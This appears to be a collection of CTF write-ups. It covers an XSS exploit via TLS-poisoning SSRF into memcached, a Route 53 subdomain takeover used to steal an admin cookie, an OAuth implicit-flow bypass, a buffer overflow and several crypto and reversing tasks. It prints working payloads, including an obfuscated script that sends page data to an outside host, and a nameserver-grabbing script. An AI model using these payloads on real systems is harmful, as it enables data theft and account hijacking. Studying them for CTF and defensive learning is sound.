The connection will get killed after some numbers of requests. To scale this up, when I repeated the process, I increased the quantity of each of the order to the amount that I can afford with the balance. Then my available balance increased increases exponentially.

With enough balance, order the golden “The flagship of pizzas”, get the flag and submitted at 4:00 AM BST. Enjoy the 🍕:

ptm{https://youtu.be/Uzryuem5NDc lets make pizza greater than zero again https://www.giallozafferano.com/recipes/Pizza-Margherita.html}

The author has a different solution to desync the balance in the session and the database, with multiple order/cancel requests can be sent in one websocket request, and how the order/cancel is handled.

Print template 2

A challenge with a web app under the misc category. IIRC the challenge was released after a while since the CTF started. It was a hard challenge, with team “organizers” first blooded it at 6:06 AM BST, and team “Kalmarunionen” submitted the flag half an hour before the CTF ends. I was not able to solve it myself. This writeup follows Sam.ninja and pilvar’s solution and payloads, which appears to be the intended solution.

The webapp lets user import templates and “print” them by substitute the place holders in the template with data, and download the print.

The user can also submit a “premium request” for review, which will be reviewed by the admin bot. Part of the template which renders the bot will visit is as follows:

<img src=data:image/png;base64,<%= request.img %>>
<p class="my-3"><%= request.msg %></p>

As with <%= tag in EJS, the output will be HTML escaped, so it is not possible to inject script with msg, however it is possible to inject script in the img tag with onerror attribute.

On the web server, the file uploaded will be encoded in base64 and stored in memcached as the img value being used when rendering the template. With it rendered into base64, it is not possible to inject script into the img tag. However, if it is possible to control the content stored into memcached, it is possible to inject script into the img tag.

SSRF via TLS Poisoning

We cannot make request from our machine directly, we will need to leverage SSRF to make request to memcached.

The “import template” function allows us to import template from a URL. The URL can be a http or https URL, and the server will make the request. The SSRF is exploited via TLS session resumption by injecting payload into session ID. As memcached commands are newline terminated and invalid input will be skipped, it is possible to inject command with new lines. This TLS Poison PoC is used to implement the exploit. More details about the exploit can be found in the presentation at DEF CON Safe Mode.

With some modification to the PoC, a customised TLS server and DNS server for DNS rebinding is set up. Make HTTPS request to the TLS server, the TLS server will response a redirect with the TLS session ID being the payload. The client will be repeatedly redirected to the TLS server until the client makes another request to the DNS server, which will resolve to the target IP. As the TLS session ID is keyed by the hostname and port but not IP address, the session ID is reused for the request to the target IP. The request will be made to the target IP with the payload in the session ID.

It is shown in the image below that the payload is in the request made by the curl client to the localhost target.

Send Payload into Memcached

When request the bot to review, the bot will visit every unvisited requests by the user where an UUID is generated and saved when the request is submitted. The UUID is also used as the key to store the request in memcached. However, the UUID is not revealed to the user. The UUID is generated with Math.random. The user IDs are also UUIDs generated with the same library, with knowing enough sequentially generated user IDs, it is possible to predict the future UUIDs.

In this writeup, I skipped the steps bruteforcing for the UUIDs, and just use the UUIDs that is printed to console when the request is submitted and the server generates it.

The script the bot executes is as follows:

fetch("/")
    .then(x=>x.text())
    .then(x=>x.split("</h3>")[1].trim())
    .then(x=>fetch("http://x.cjxol.com/"+x))

The final payload for TLS session ID becomes the following:

set message_cd330b28-93e9-4524-a70b-d1a03fac941c 0 0 434
{"msg":"whatever","img":"a id=deny onerror=eval(String.fromCharCode(102,101,116,99,104,40,34,47,34,41,46,116,104,101,110,40,120,61,62,120,46,116,101,120,116,40,41,41,46,116,104,101,110,40,120,61,62,120,46,115,112,108,105,116,40,34,60,47,104,51,62,34,41,91,49,93,46,116,114,105,109,40,41,41,46,116,104,101,110,40,120,61,62,102,101,116,99,104,40,34,104,116,116,112,58,47,47,120,46,99,106,120,111,108,46,99,111,109,47,34,43,120,41,41))"}
set message_cd330b28-93e9-4524-a70b-d1a03fac941c 0 0 434
{"msg":"whatever","img":"a id=deny onerror=eval(String.fromCharCode(102,101,116,99,104,40,34,47,34,41,46,116,104,101,110,40,120,61,62,120,46,116,101,120,116,40,41,41,46,116,104,101,110,40,120,61,62,120,46,115,112,108,105,116,40,34,60,47,104,51,62,34,41,91,49,93,46,116,114,105,109,40,41,41,46,116,104,101,110,40,120,61,62,102,101,116,99,104,40,34,104,116,116,112,58,47,47,120,46,99,106,120,111,108,46,99,111,109,47,34,43,120,41,41))"}

The payload is repeated twice as the injection sometimes does not work as expected. The image tag sets ID to deny as the bot will click on the deny button which can cause a navigation before the script is executed. With image ID set as deny, the bot will not click on the deny button and click the image instead which does not cause a navigation.

In the get-template page, import template from the URL pointing to the TLS server. After a while, the web server will make request to Memcached and the payload will be stored in Memcached.

When querying Memcached directly, we can see the payload is stored in Memcached.

When requested to review the requests, the bot will visit the page and execute the script. The flag is exfiltrated.

The image is showing the fake flag for testing, and the real flag is:

ptm{why_an0ther_ch4ll_w1th_4_b0t??}

We did the 12-hour CTF on 4th May 2023. The CTF is unique and primarily focused on DevSecOps, including CI/CD pipelines, cloud etc. It is not in my best expertises, but we had a strong team and managed to full clear all the challenges and won the CTF.

We were one of the only teams solved this subdomain takeover challenge. This solve involves exploiting a dangling delegation DNS record on AWS Route 53 to takeover a subdomain, thus bypass some CSP restrictions.

The Challenge and Solve

The notes and screenshots were taken when different challenge instances were running, so several different challenge domains may be in the writeup below.

Finding the Dangling Delegation

In the challenge description, it suggested to do a scan of possible subdomain takeover with dnsReaper tool made and open sourced by Punk Security.

After the scan, we found a dangling delegation DNS record for zone dev.[challenge domain], as shown in the screenshot below.

I then created hosted zone on AWS Route 53 for dev.[challenge domain] and AWS will randomly assign 4 nameservers for the hosted zone. I used the following script to repeatedly create hosted zone and check the nameservers until I got at least one of the nameservers that the zone is delegated to.

import boto3
import uuid
client = boto3.client('route53')
target_nameservers = 'ns-423.awsdns-52.com,ns-904.awsdns-49.net,ns-1899.awsdns-45.co.uk,ns-1125.awsdns-12.org'
target_nameservers = set(target_nameservers.split(','))
count = 0
while True:
    count += 1
    print(count, end='\r')
    zone = client.create_hosted_zone(
        Name='dev.d9edd91f-c40.ctf.two.dr.punksecurity.cloud',
        CallerReference=str(uuid.uuid4()),
        HostedZoneConfig={
            'PrivateZone': False
        }
    )
    id = zone['HostedZone']['Id']
    nameservers = set(zone['DelegationSet']['NameServers'])
    if len(nameservers & target_nameservers) > 0:
        break
    client.delete_hosted_zone(Id=id)

It took only just over 100 attempts to get a nameserver that the zone is delegated to.

Finding Loopholes on the Web

The web app to be exploited uses CSP to restrict the loading of external scripts. It only allows the script from the same origin. However, the session cookie is set to the domain scope of .[challenge domain], that means when making requests to any subdomains or even sub-subdomains etc, the session cookie will be included.

The CSP on the web app also allows images from any origin, so we can load images from the subdomain we took over.

With the dev.[challenge domain] zone we took over with our own AWS account, we can create a subdomain takeover.dev.[challenge domain] and point it to a web server we control.

Thus, we I post a comment with the following content, the admin bot will make request to our server with the session cookie.

<img src="http://takeover.dev.[challenge domain]">

With the session cookie of the admin bot, we can now make request to the web app with the session cookie and get the flag.

Notes and Findings during the CTF

In the results.csv outputted by dnsReaper, I noticed the link to a GitHub Issue discussing about some protections on AWS Route 53 against domain takeover because of dangling delegation. In that discussion, there is a link to a video demo of the subdomain take over on AWS Route 53 at BSides Newcastle by SimonGurney whom is the author of dnsReaper. Despite not the best recording audio quality, the demo was very helpful to understand this exploit.

Regarding the protection from dangling delegation records in Route 53, when the subdomain hosted zone is removed, the delegation will need to be removed and recreated to delegate the subdomain to a hosted zone. However, if a hosted zone is never created before the delegation, meaning the domain has always been dangling, the protection will not automatically protect against subdomain takeover.

There are many challenges in this CTF which are great for learning yet still challenging and not trivial. Kudos to the organiser! Here are the writeups to some of the challenges my team solved.

On this page:

• Crypto Warmup 1 - Simple cipher challenge
• Crypto Warmup 2 - Simple cipher challenge
• Crypto Baby AES - Simple AES key brute force
• Misc Minecraft’s Deadly Dilemma
• Reverse Simple Checkin - Simple binary xor reversing
• Reverse Micro Assembly - Simple “hypothetical assembly language” reversing
• Reverse Solid Reverse - Solidity/smart contract reversing
• Pwn Acceptance - Buffer overflow to overwrite variable
• Web Safe Locker - Client-side bruteforce
• HoYoverse II: Prompt Bot - ChatGPT prompt target output challenge
• HoYoverse III Secret Vault - Crypto challenge solving linear equations

Crypto Warmup 1

Decode the following ciphertext: GmvfHt8Kvq16282R6ej3o4A9Pp6MsN.

This actually took my team a while to figure out, and this challenge got fewer solves compared to Crypto Warmup 2 below (175 and 233 solves respectively). Turns out to solve it need to do rot13 then base58 decode.

The flag is cvctf{base58_with_rot}.

Crypto Warmup 2

This cipher is invented by French cryptographer Felix Delastelle at the end of the 19th century.
Ciphertext: SCCGDSNFTXCOJPETGMDNG Hint: CTFISGODABEHJKLMNPQRUVWXY

When seeing random ciphers in CTF, I immediately think of dcode.fr. After a quick Google search for “Felix Delastelle cipher”, the 3rd result was the link to decode.fr.

Crypto Baby AES

In this challenge the flag is encrypted with AES CBC mode, with IV and the encrypted flag provided in the output. The key is generated with the code below:

KEY_LEN = 2
BS = 16
key = pad(open("/dev/urandom","rb").read(KEY_LEN), BS)

The unknown part of the key is only 2 bytes, so we can brute force it, and decrypt the flag.

Misc Minecraft’s Deadly Dilemma

The challenge provided two grayscale images “pickaxe.png” and “sword.png”, and the goal is to find a image with L1 distance to “pickaxe.png” close enough that is smaller than $474^2 = 224676$, but with L2 distance to “pickaxe.png” larger than to “sword.png”. The L2 distance between the provided two images is 10411.40 and the L1 distance is 442888.

To find such image, I tried two approaches:

• The first one is to start with “pickaxe.png”, so the L1 distance is 0, and then change the pixels value where “pickaxe.png” is smaller than “sword.png” to the maximum value, which would result in a larger increase in L2 distance for “pickaxe.png” than for “sword.png” until before the L1 distance reaches over 224676. However, as the L2 distance to “sword.png” is already quite large, the L1 distance would reach over 474 before the L2 distance to “pickaxe.png” is larger than to “sword.png”.

• The second approach is also to start with “pickaxe.png”, but instead of increasing the L2 distance for “pickaxe.png”, I reduce the L2 distance to “sword.png” while increasing the L2 distance to “pickaxe.png” until the L2 distance to “pickaxe.png” is larger than to “sword.png” while the L1 distance is still smaller than 224676. The code is shown below:

  xy = []
  for i in range(64):
    for j in range(64):
        p1 = pick.getpixel((i, j))
        p2 = sword.getpixel((i, j))
        xy.append((p1 - p2, (i, j)))
  xy.sort() # large negative first
  for i in range(3500):
    p, c = xy[i]
    pick.putpixel(c, sword.getpixel(c))
  pick.save('out.png')
  

Reverse Simple Checkin

Decompile the binary provided with the binary, realising the binary is to check if the input xor with some data is equal to some other data. Implemented the script in Python to xor the two data and get the very long flag:

cvctf{i_apologize_for_such_a_long_string_in_this_checkin_challenge,but_it_might_be_a_good_time_to_learn_about_automating_this_process?You_might_need_to_do_it_because_here_is_a_painful_hex:32a16b3a7eef8de1263812.Enjoy(or_not)!}

Reverse Micro Assembly

In this challenge, an assembly file in AT&T syntax is provided. After Googling around of the instructions (especially something special with the DIV instruction which takes 3 arguments and followed with instruction to compare value in register 12), I found out that the assembly is “hypothetical assembly language”, which is based on x86 assembly. The instructions reference can be found on http://www.ctoassembly.com/asm.html.

As there are conditional jumps in the assembly, however they do not form any loops, I solved this challenge by hand and the resulting stack contains the flag.

Reverse Solid Reverse

This challenge is to reverse a smart contract in Solidity. The contract is shown below:

contract ReverseMe {
    uint goal = 0x57e4e375661c72654c31645f78455d19;
    function magic1(uint x, uint n) public pure returns (uint) {
        // Something magic
        uint m = (1 << n) - 1;
        return x & m;
    }
    function magic2(uint x) public pure returns (uint) {
        // Something else magic
        uint i = 0;
        while ((x >>= 1) > 0) {
            i += 1;
        }
        return i;
    }
    function checkflag(bytes16 flag, bytes16 y) public view returns (bool) {
        return (uint128(flag) ^ uint128(y) == goal);
    }
    modifier checker(bytes16 key) {
        require(bytes8(key) == 0x3492800100670155, "Wrong key!");
        require(uint64(uint128(key)) == uint32(uint128(key)), "Wrong key!");
        require(magic1(uint128(key), 16) == 0x1964, "Wrong key!");
        require(magic2(uint64(uint128(key))) == 16, "Wrong key!");
        _;
    }
    function unlock(bytes16 key, bytes16 flag) public view checker(key) {
        // Main function
        require(checkflag(flag, key), "Flag is wrong!");
    }
}

The unlock function will check if the key is correct through the checker modifier. Then it will check that the flag xor with the key is equal to the goal. So we can get the flag by xor the goal with the key. The key is not provided, but we can get it by solving the checker modifier.

The magic1 function is to get the lower 16 bits of the key, and the magic2 function is to get the number of bits of the key.

• The first line of the checker is to check if the first 8 bytes of the key is 0x3492800100670155.
• The second line is to check that the lower 32 bits of the key is equal to the lower 64 bits of the key, which means the upper 32 bits in the lower 64 bits of the key is zero.
• The third line is to check that the lower 16 bits of the key is 0x1964.
• The fourth line is to check that the number of bits of the lower 64 bit of the key is 16 + 1 = 17 excluding leading zeros. This resulting in the lower 64 bit of the key is between 0x10000 and 0x1ffff.

The final key is 0x34928001006701550000000000011964, and flag can be obtained by xor the key with the goal.

Pwn Acceptance

The challenge provided a binary executable. Decompile the binary with IDA, the code snip for main function is shown below:

read(0, &say, 0x24uLL);
if ( accept )
  print_flag();
else
  puts("Arg! Why don't you help me :((");
return 0;

Looking into &say, it points to some statically allocated variable (.bss) with size of 32 bytes, while the read would read up to 0x24 (36) bytes. The accept variable is 4 bytes and is located right after &say. So we can overflow the accept variable and overwrite it with non-zero value to make print_flag() to be called.

Decompile the print_flag() function, there are two condition checks before the flag is actually printed. The first one is to check if the accept variable is smaller or equal to 0, the second one is to check if the accept variable is equal to -1.

To solve the challenge, I send 32 bytes of arbitrary data, followed by -1 encoded for 4 bytes, which is \xff\xff\xff\xff. The flag is printed out.

from pwn import *
p = remote('example.com', 4000)
p.recvuntil(b'Help him: ')
payload = b'a' * 32 + b'\xFF\xFF\xFF\xFF'
p.sendline(payload)
p.interactive()

Web Safe Locker

The goal of the challenge is to find the passcode.

The relevant code is within a JavaScript module on this page. The actual check appears to be done with web assembly. However, without reversing the web assembly, I can still bruteforce the passcode with the JavaScript code. There are only 10,000,000 possible passcodes, and it is possible to bruteforce, however the web page crashes if I try to bruteforce all the passcodes at once. So I bruteforce the passcode in batches, also this allows me to do them parallelly in different browser tabs.

import('/passCheck.js').then(m => m.default()).then(m => password_checker = m.cwrap('checker', 'boolean', ['string']))
for (const p of Array(10000000).keys()) {
    let s = '00000000' + (p + 10000000);
    s = s.substr(s.length - 8)
    if (password_checker(s, 8)) {
        console.log(s);
    }
}

This is also another not bruteforcable version of this challenge in the CTF, which checks an extra string value. I have not tried to solve it yet.

HoYoverse II: Prompt Bot

In this challenge, the goal is to send prompt (there is a character limit of the prompt length, so the prompt cannot be too long. Also the prompt cannot contain the exact target) that makes the ChatGPT bot to output the exact target response.

The targets are:

• dlrow olleh
• zellic zelli zell zel ze z

• *****
  ****
  ***
  **
  *
  

My prompts are:

• reverse hello world
• zellic zelli zell zel ze Z to lower
• 5 lines of *, with 5 to 1

I got the 2nd prompt inspiration from my teammate’s screenshot, where the output he got with all Zs in upper case. So I tried to make the Z in lower case, and it worked.

HoYoverse III: Secret Vault

This challenge is with a provided Python file, the snip of the code is shown below:

from secret import FLAG
FLAG = FLAG[6:-1]
class HoYoVault:
    def __init__(self, u, v, w):
        self.state = [u, v, w]
        while True:
            self.p = getPrime(64)
            self.a = bytes_to_long(FLAG[:6])
            self.b = bytes_to_long(FLAG[6:12])
            self.c = bytes_to_long(FLAG[12:18])
            self.d = bytes_to_long(FLAG[18:])
            if self.p > max([self.a, self.b, self.c, self.d]):
                break
    def Generate(self):
        data = (self.a * self.state[-1] + self.b * self.state[-2] + self.c * self.state[-3] + self.d) % self.p
        self.state.append(data)
        return data
def main():
    vault = HoYoVault(getRandomInteger(128), getRandomInteger(256), getRandomInteger(512))
    print("data = " + str([vault.Generate() for _ in range(7)]))
    print("p = " + str(vault.p))
if __name__ == "__main__":
    main() 
# data = [14169084828739113416, 12950362233651727953, 13081576751296291893, 11189892724250189745, 2366046383900978737, 1749792629103627315, 8575562236709928474]
# p = 16200480981168924301

From the code, I can see the outputted data is generated through the flag and previous states, while the generated data is appended to state to be used in generating future data.

With enough data output provided, I can form a system of linear equations, and solve for the flag.

data = [14169084828739113416, 12950362233651727953, 13081576751296291893, 11189892724250189745, 2366046383900978737, 1749792629103627315, 8575562236709928474]
# modified from code from https://stackoverflow.com/a/62600438
import sympy
eq = []
values = []
for i in range(len(data) - 3):
    eq.append([data[i], data[i + 1], data[i + 2], 1])
    values.append(data[i + 3])
eq = sympy.Matrix(eq)
values = sympy.Matrix(values)
m = 16200480981168924301
det = int(eq.det())
if gcd(det, m) == 1:
    ans = int(pow(det, -1, m)) * eq.adjugate() @ values % m
flag = b''
for i in ans:
    flag += int(i).to_bytes(6, 'big')
print(flag)

I was also trying to use solve_mod in SageMath instead of pulling code from Stack Overflow, which worked great in one of the ImaginaryCTF challenges sharing the very similar idea but with an a lot smaller modulus. However, when I used it in this challenge, I got the following error:

OverflowError: Python int too large to convert to C ssize_t

After the CTF ended, on Cryptoverse Discord server, Neobeo from the “Social Engineering Experts” team (I think) suggested that they were able to define the linear equations in a Finite Field in SageMath and used solve_right to solve the equations.

This is my writeup to the web challenge I created for pwnEd4 Quals CTF organised by University of Edinburgh’s cyber security society SIGINT. The online CTF was on 18th and 19th for 32 hours. With over 30 teams submitted at least one flag, only 2 teams successfully solved this web challenge.

This challenge exploits improper use of OAuth2 for authentication, more specifically with Implicit Flow. It is inspired by a vulnerability I made in my own project, as well as similar issues found in the wild (in my opinion this can partly attribute to developer docs failing to make it clear about the danger of using OAuth2 Implicit Grant).

To understand this challenge, it is helpful to know about both OAuth2 Authorization Code Grant and Implicit Grant, and here are some resources: https://developer.okta.com/blog/2018/04/10/oauth-authorization-code-grant-type and https://developer.okta.com/blog/2018/05/24/what-is-the-oauth2-implicit-grant-type.

The Challenge

The challenges has a “Vault” app, where the flag is stored in.

Clicking on “View flag”, it redirects to the auth server to login. Logging in with a newly created account, it redirects back to the Vault app’s flag page, however, it says do not have permission to view the flag.

In the auth service, any registered user can create apps.

When “publishing” the app, the admin bot will try to authorize the app, resulting in a request to the redirect URL with the authorization code.

The Solve

Substituting the code with the one in admin bot’s request to login to Vault would not work, as the OAuth2 server will be able to tell the code is not for Vault thus not valid, when Vault exchanges token using the code along with its client ID and secret.

The solution to this challenge is to exchange the authorization code for access token with the valid client ID and client secret at auth service’s /oauth2/token endpoint, and substitute the token into Vault’s implicit flow callback.

There are two hints in the challenge that the Vault app supports implicit flow. One is on the auth service config page, where it can generates OAuth2 URL for an app. In the response type selection, there is a “token” option (though it’s on the auth service, it’s in a CTF challenge, it must be relevant :P). Replace “response_type” from code to token in the login page and proceed the authorisation normally will confirm Vault supports implicit flow. Another is on the screen confirming authorising Vault app, click “Cancel”, the callback page will render Javascript tries to use implicit flow.

To solve the challenge less painfully, there are some details. One is that the access code can only be used to exchange for token once, within valid time. Another is “state” only stay valid before sent to callback endpoint in Vault. To generate a new valid state, click on “Login” in Vault again, and the state can only be used with the session cookie.

Conclusion

OAuth2 is for authorisation, and can be dangerous used for authentication without additional checks. Implicit Grant should be avoided. Developer docs should make clear of security implications.

The challenge was initially labelled as “easy” at the beginning of the event, and was changed to “medium” after 2 hours into the CTF with no solves to this challenge. Our team was the 2nd solved and submitted flag to this challenge, about one or two hours after the challenge first been solved about 24 hours into the CTF. There were 6 solves to this challenge in the 54 hours CTF with 328 teams submitted at least one flag.

The Challenge

The challenge is given with the following description:

You find yourself in possession of an ancient forbidden spell. Rumors have it that by revealing the rune originated from the spell, the mystery behind how you perish will be unveiled.

The challenge is also with a downloadable containing a forbiden_spell.pt file and a challenge.py file.

The Python file contains a convolutional neural network implemented in PyTorch, with the weights initialisation using a fixed seed, and code in comments defining some dummy_data_size. The model is for classification with 100 output classes, and input is 1-channel (greyscale) 32x32 image.

import torch
import torch.nn as nn
torch.manual_seed(50)
device = "cpu"

def weights_init(m):
    if hasattr(m, "weight"):
        m.weight.data.uniform_(-0.5, 0.5)
    if hasattr(m, "bias"):
        m.bias.data.uniform_(-0.5, 0.5)

class LeNet(nn.Module):
    def __init__(self):
        super(LeNet, self).__init__()
        act = nn.Sigmoid
        self.body = nn.Sequential(
            nn.Conv2d(1, 12, kernel_size=5, padding=5//2, stride=2),
            act(),
            nn.Conv2d(12, 12, kernel_size=5, padding=5//2, stride=2),
            act(),
            nn.Conv2d(12, 12, kernel_size=5, padding=5//2, stride=1),
            act(),
            nn.Conv2d(12, 12, kernel_size=5, padding=5//2, stride=1),
            act(),
        )
        self.fc = nn.Sequential(
            nn.Linear(768, 100)
        )
        
    def forward(self, x):
        out = self.body(x)
        out = out.view(out.size(0), -1)
        out = self.fc(out)
        return out
    
net = LeNet().to(device)
net.apply(weights_init)
criterion = nn.CrossEntropyLoss()

"""
forbidden_spell = torch.load('path to challenge file')
dummy_data_size=torch.Size([1, 1, 32, 32])

#code here 
"""

Load and inspecting forbidden_spell.pt, it contains a list of torch tensors, the shape of the data in the file matches with the model parameters of the model defined in challenge.py . Their shape can be printed out with for s in forbidden_spell: print(s.shape) and for parameters in net.parameters(): print(parameters.shape) respectively, and gives:

torch.Size([12, 1, 5, 5])
torch.Size([12])
torch.Size([12, 12, 5, 5])
torch.Size([12])
torch.Size([12, 12, 5, 5])
torch.Size([12])
torch.Size([12, 12, 5, 5])
torch.Size([12])
torch.Size([100, 768])
torch.Size([100])

The description of the challenge does not seem clear with meaningful information (which is even misleading to me, as it turns out the challenge is indeed to work backwards while the description says “the rune originated from the spell”). The data in the pt file matches the shape of the model parameters perfectly, maybe it is the model weights, or maybe it is something else? Does the manual seed matter or it’s just irrelevant?

It seems I would either happen to know the attack or I have to do a lot of guessing work.

The Solve

After some trial and error, some guessing and research, we found very interesting research (Zhu et al., 2019) and GitHub repository with model very similar to the model used in the challenge.

Both the research and the code demonstration shows the possibility to recover training data with just model and the gradients for the data. The idea is to train some dummy data and label to produce the gradients that match the given gradient using gradient descent methods.

To this challenge, we realised instead of being the weights, the “forbidden spell” given in the pt file could be the gradient from the training data (which could a image lead to the flag), and the model should be initialised with the given random seed and initialisation functions. We modified the script main.py in the GitHub repository to solve the challenge (append to original challenge.py):

"""
Need to include original challenge script here.
Also initialising the model with the given random seed is very important!
"""

import torch.nn.functional as F
from torchvision import transforms
import matplotlib.pyplot as plt

def cross_entropy_for_onehot(pred, target):
    return torch.mean(torch.sum(- target * F.log_softmax(pred, dim=-1), 1))

tt = transforms.ToPILImage()

# Load the gradient
original_dy_dx = torch.load('forbidden_spell.pt')
original_dy_dx = tuple(original_dy_dx)

# generate dummy data and label
dummy_data = torch.randn((1, 1, 32, 32)).to(device).requires_grad_(True)
dummy_label = torch.randn((1, 100)).to(device).requires_grad_(True)

optimizer = torch.optim.LBFGS([dummy_data, dummy_label])
criterion = cross_entropy_for_onehot

for iters in range(100):
    def closure():
        optimizer.zero_grad()

        dummy_pred = net(dummy_data) 
        dummy_onehot_label = F.softmax(dummy_label, dim=-1)
        dummy_loss = criterion(dummy_pred, dummy_onehot_label) 
        dummy_dy_dx = torch.autograd.grad(dummy_loss, net.parameters(), create_graph=True)
        
        grad_diff = 0
        for gx, gy in zip(dummy_dy_dx, original_dy_dx): 
            grad_diff += ((gx - gy) ** 2).sum()
        grad_diff.backward()
        
        return grad_diff
    
    optimizer.step(closure)
    if iters % 10 == 0: 
        current_loss = closure()
        print(iters, "%.4f" % current_loss.item())
        plt.imshow(tt(dummy_data[0].cpu()))
        # plt.savefig(f'save/{iters}.png')
        # torch.save(dummy_data[0].cpu(), f'save/{iters}.pt')

After about 20-30 iterations, we got a QR code that we could scan with many of the QR code scan apps on our phones.

Scan the QR code, got the flag HTB{d0nt_sh4r3_y0ur_fl4g}.

Other (Irrelevant) Path We Went Down

Initially, we thought the given pt file is the weights of the model, and the challenge would be solved by somehow getting the input data. I came across a Misc challenge called “Battle in OrI/On” in HTB Cyber Apocalypse CTF 2022, which was to find the input of the neural net which gives the required output. For this challenge, we tried to train the input data for every of the 100 possible output classes (assuming the output would look like one-hot encoding). However, we did not see anything looks like the flag in the trained pattern.

Looking at the patterns for each of the possible output classes, we noticed that class 55 outputs very different patterns to everything else, as well as the loss for that class is always 0 or near 0. We inspected the last tensor (we assumed it was the bias of the output layer) in the pt file, and noticed a large- close-to-1 value at index 55. I guessed that maybe class 55 is the output, but the input was not learning because of almost no loss due to the large bias, so I manually set the bias to a very negative value and train the input. However, we still did not get the flag.

There were other things we tried, including to have random input or trained pattern from above as input and visualise each layer of the model output.

References

1. Zhu, L., Liu, Z., & Han, S. (2019). Deep Leakage from Gradients. Advances in Neural Information Processing Systems.